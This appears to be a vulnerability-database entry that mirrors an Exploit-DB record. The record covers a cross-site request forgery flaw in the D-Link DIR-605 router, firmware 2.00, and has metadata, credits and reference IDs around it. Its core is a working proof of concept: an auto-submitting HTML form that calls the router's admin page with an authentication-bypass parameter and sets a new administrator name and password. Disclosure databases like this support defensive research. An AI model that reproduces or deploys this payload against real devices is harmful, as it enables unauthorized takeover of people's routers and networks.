Sign-up

ID

VAR-E-201203-0254


EDB ID

18638


TITLE

D-Link DIR-605 - Cross-Site Request Forgery - Hardware webapps Exploit

Trust: 0.6

sources: EXPLOIT-DB: 18638

DESCRIPTION

D-Link DIR-605 - Cross-Site Request Forgery. CVE-80549 . webapps exploit for Hardware platform

Trust: 0.6

sources: EXPLOIT-DB: 18638

AFFECTED PRODUCTS

vendor:d linkmodel:dir-605scope: - version: -

Trust: 1.6

sources: EXPLOIT-DB: 18638 // EDBNET: 40975

EXPLOIT

# Exploit Title: D-Link DIR-605 CSRF Vulnerability
# Date: 20-03-2012
# Author: iqzer0++
# Version: Firmware Version : 2.00
# Tested on: DIR-605

This allows unauthroized access to the device and post injections

<html>
<form name="bypass" action="
http://xxx.xxx.xxx.xxx/tools_admin.php?NO_NEED_AUTH=1&AUTH_GROUP=0"
method="post">
<input type="hidden" name="ACTION_POST" value="1" />
<input type="hidden" name="admin_name" value="iqzer0" />
<input type="hidden" name="admin_password1" value="bypass" />
<input type="hidden" name="admin_password2" value="bypass" />
</form>
<script>document.bypass.submit();</script>
</html>

Trust: 1.0

sources: EXPLOIT-DB: 18638

EXPLOIT LANGUAGE

txt

Trust: 0.6

sources: EXPLOIT-DB: 18638

PRICE

free

Trust: 0.6

sources: EXPLOIT-DB: 18638

TYPE

Cross-Site Request Forgery

Trust: 1.0

sources: EXPLOIT-DB: 18638

CREDITS

iqzer0

Trust: 0.6

sources: EXPLOIT-DB: 18638

EXTERNAL IDS

db:EXPLOIT-DBid:18638

Trust: 1.6

db:EDBNETid:40975

Trust: 0.6

sources: EXPLOIT-DB: 18638 // EDBNET: 40975

REFERENCES

url:https://www.exploit-db.com/exploits/18638/

Trust: 0.6

sources: EDBNET: 40975

SOURCES

db:EXPLOIT-DBid:18638
db:EDBNETid:40975

LAST UPDATE DATE

2022-07-27T10:03:26.891000+00:00


SOURCES RELEASE DATE

db:EXPLOIT-DBid:18638date:2012-03-21T00:00:00
db:EDBNETid:40975date:2012-03-21T00:00:00